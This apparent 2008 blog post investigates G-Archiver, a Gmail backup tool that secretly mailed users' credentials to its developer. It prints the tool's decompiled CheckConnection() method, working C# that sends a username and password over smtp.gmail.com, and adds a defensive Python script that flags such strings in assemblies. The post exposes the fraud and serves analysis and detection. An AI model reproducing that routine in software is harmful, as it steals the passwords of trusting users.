Saturday, March 8, 2008

A Gmail Passwords Theft Story

No talk about technologies, not this time. Instead, a little lesson in programming ethics drawn from a real-life incident.

I was roaming the web, together with Mrs. Insomnia, early in the morning when I read a story of programming horror. It was about a malicious software application that stole Gmail accounts. You can find it in this Coding Horror blog post. Having nothing better to do, I decided to verify the story and see for myself what was going on.

To begin with, there was this guy with the codename "John Terry" (John Terry is actually a football player, Chelsea's captain; Chelsea is not only Hillary Clinton's daughter but also a football club in England), who developed an application called G-Archiver. It can be found on popular software hosting sites like brothersoft.com. What this terrific application does is back up your Gmail account to a local drive. Of course, at some point you have to enter your Gmail account details, i.e. the username and the password. The trouble begins here, because the developer hardcoded into the application a routine that sends each user's Gmail credentials to his own Gmail account. So every time a user enters his details, an e-mail is sent to the wise guy with a copy of them. If he is not a malicious password thief, this guy must be a mail-spam masochist.

Fortunately, a programmer who used the software reverse-engineered G-Archiver (which is written in .NET). I can imagine his surprise when he found out what was going on. The malicious developer's own Gmail credentials were right there in the code, and he used them to log in to that account. The picture shows exactly this: there were about 2000 e-mails waiting, every one of them a stolen Gmail username and password from another user. There is also a name, Pawel Lesnikowski, in the developer's contacts. If you Google the name, you land on a site with .NET libraries and applications. Remember the name for later (see Update #2 at the end of the post).

Now we should make our own investigation and take it a little further. For the fun of it, and to verify the story, I downloaded and installed G-Archiver. The application uses two libraries, Mail.dll and SM.dll, both written for .NET. I opened them with Reflector and first checked the Mail.dll library, which is a mail library from lesnikowski.com. From a quick search I could not find anything suspicious in this assembly; it looks like a helper library. Maybe our guy just used it for his purpose, and maybe he e-mailed Lesnikowski at some point, which is why the name appears in his contacts (see Update #2).

Now to the creepy clue. When I sliced open the SM.dll assembly, there in front of me was a function called CheckConnection(). What is its purpose? It certainly does not check the user's connection. You have probably guessed right: it sends the user's account details, of course! On the right is the function as disassembled by Reflector. Just a parenthesis: these guys were such amateurs that they did not even run an obfuscator to cover their tracks. Anyway, if you cannot view the image well, here is the code:

using System.Net;
using System.Net.Mail;
using System.Text;

// From SM.dll as decompiled by Reflector. The name says "check connection";
// the body mails the user's Gmail username (a) and password (b) to the developer.
// The method signature is reconstructed from the parameter names in the body;
// Reflector showed only the body.
private static void CheckConnection(string a, string b)
{
    MailMessage message = new MailMessage();
    message.To.Add("JTerry79@gmail.com");
    message.From = new MailAddress("JTerry79@gmail.com", "JTerry", Encoding.UTF8);
    message.Subject = "Account";
    message.SubjectEncoding = Encoding.UTF8;
    // Message body contains the username and password...
    message.Body = "Username: " + a;
    message.Body = message.Body + "\r\nPassword: " + b;
    message.BodyEncoding = Encoding.UTF8;
    message.IsBodyHtml = false;
    message.Priority = MailPriority.High;
    SmtpClient client = new SmtpClient();
    // ...authenticates to Gmail with the wise guy's own account (password redacted here)...
    client.Credentials = new NetworkCredential("JTerry79@gmail.com", "*******");
    client.Port = 0x24b; // 587, the SMTP submission port
    client.Host = "smtp.gmail.com";
    client.EnableSsl = true;
    // ...and sends the mail
    client.Send(message);
}

And the user's Gmail credentials are stolen, with high priority! As you can see, I have hidden the guy's Gmail account password, not to protect him but to protect his users, the ones who trusted his application. After all, there are thousands of Gmail accounts in that mailbox, and most of them might still be active. There is also a company associated with the software, MateMedia Inc. The sad part is that if you Google "gmail backup", the software's site (garchiver.com) appears on the second page of the results. Too bad..
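As an added example (my own code, not part of the original post and not taken from G-Archiver), here is the kind of quick triage a reverse engineer can run before even opening Reflector. An unobfuscated .NET assembly keeps its string literals in the #US metadata heap as UTF-16LE and its type and method names in the #Strings heap as plain text, so "smtp.gmail.com", the Gmail address, the "Username: " and "Password: " labels, and the references to SmtpClient and NetworkCredential are all visible to a strings scan. The script below extracts both kinds of strings from a byte blob and flags that combination. The blob it scans is constructed by hand to mimic those two heaps; it is not extracted from SM.dll, and the indicator lists and verdict thresholds are my own assumptions.

```python
"""Triage a .NET assembly blob for hardcoded mail-exfiltration indicators.

Added example for this post, not code from G-Archiver or its author. The
sample heaps below are constructed to mimic the #US (UTF-16LE literals) and
#Strings (NUL-separated identifiers) heaps; nothing here is read from SM.dll.
"""
from __future__ import annotations

import re
from dataclasses import dataclass

UTF16_RUN = re.compile(rb"(?:[\x20-\x7e]\x00){4,}")   # printable UTF-16LE runs
ASCII_RUN = re.compile(rb"[\x20-\x7e]{4,}")           # printable ASCII runs
EMAIL = re.compile(r"[A-Za-z0-9._%+-]+@[A-Za-z0-9.-]+\.[A-Za-z]{2,}")
MAIL_HOST = re.compile(r"(smtp|mail|imap|pop3?)\.[a-z0-9.-]+\.[a-z]{2,}", re.I)
CRED_LABEL = re.compile(r"user ?name|password|passwd|credential", re.I)
MAIL_APIS = {"SmtpClient", "MailMessage", "NetworkCredential", "MailAddress"}  # assumed list


@dataclass(frozen=True)
class Finding:
    kind: str    # email-address | mail-host | credential-label | mail-api
    value: str


def extract_strings(blob: bytes) -> list[str]:
    """Return printable UTF-16LE and ASCII runs of four or more characters."""
    out = [m.group().decode("utf-16-le") for m in UTF16_RUN.finditer(blob)]
    out += [m.group().decode("ascii") for m in ASCII_RUN.finditer(blob)]
    return out


def triage_strings(strings: list[str]) -> list[Finding]:
    """Map each string to zero or more indicator findings."""
    findings: list[Finding] = []
    for s in strings:
        findings += [Finding("email-address", a) for a in EMAIL.findall(s)]
        if MAIL_HOST.fullmatch(s.strip()):          # "Mail.dll" does not match
            findings.append(Finding("mail-host", s.strip()))
        if CRED_LABEL.search(s):
            findings.append(Finding("credential-label", s.strip()))
        if s in MAIL_APIS:
            findings.append(Finding("mail-api", s))
    return findings


def triage_assembly(blob: bytes) -> list[Finding]:
    return triage_strings(extract_strings(blob))


def verdict(findings: list[Finding]) -> str:
    """SUSPECT only when the blob talks SMTP, names an address and labels credentials."""
    kinds = {f.kind for f in findings}
    talks_mail = bool(kinds & {"mail-host", "mail-api"})
    if talks_mail and "credential-label" in kinds and "email-address" in kinds:
        return "SUSPECT"
    if talks_mail or "email-address" in kinds:
        return "REVIEW"          # a real mail client looks like this too
    return "CLEAN"


def _us_entry(text: str) -> bytes:
    """One #US heap entry: one-byte length, UTF-16LE chars, terminal byte."""
    payload = text.encode("utf-16-le") + b"\x00"
    assert len(payload) < 0x80    # single-byte compressed length suffices here
    return bytes([len(payload)]) + payload


# Constructed sample: the literals visible in CheckConnection() plus benign
# ones, followed by a #Strings-style run of NUL-separated identifiers.
SAMPLE_ASSEMBLY = (
    b"\x00" + b"".join(_us_entry(s) for s in [
        "Backup complete", "JTerry79@gmail.com", "JTerry", "Account",
        "Username: ", "\r\nPassword: ", "smtp.gmail.com", "Mail.dll",
    ])
    + b"\x00".join(n.encode() for n in [
        "CheckConnection", "SmtpClient", "MailMessage", "NetworkCredential",
    ]) + b"\x00"
)

# Constructed control: a backup tool that never touches mail.
BENIGN_ASSEMBLY = b"\x00" + _us_entry("Backup complete") + b"ZipArchive\x00"


if __name__ == "__main__":
    for name, blob in [("sample", SAMPLE_ASSEMBLY), ("benign", BENIGN_ASSEMBLY)]:
        found = triage_assembly(blob)
        print(name, verdict(found), *sorted(f"{f.kind}={f.value}" for f in found), sep="\n  ")
```

To run it against a real file, pass the bytes of the DLL to triage_assembly instead of SAMPLE_ASSEMBLY. A backup tool whose strings come back SUSPECT deserves the full Reflector treatment; a tool that merely references System.Net.Mail gets REVIEW rather than a verdict, because a legitimate mail client looks exactly the same at this level. An obfuscator that encrypts literals defeats this scan, which is why the post's remark about the missing obfuscator matters.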

As the Coding Horror writer correctly points out, incidents like this hurt people's trust in professional application developers. However, it was also developers who discovered and exposed this fraud. It is a race in which all developers participate. Ad infinitum, or while(true)..

Update #1: I heard the company posted on their site that this piece of code was for testing and was not removed, as it should have been, before release. :) Yeah, right..

Update #2: As I wrote in the initial post, there was nothing suspicious in the Lesnikowski mail library, and the G-Archiver developer possibly used it and at some point wrote an e-mail to him. It turns out that this actually happened: I received an e-mail from Pawel Lesnikowski, who added that they abused his work without acquiring a license and that they had contacted him with questions about his Mail.dll library. I therefore feel obliged to make some minor changes to the original post. His work can be found at lesnikowski.com.
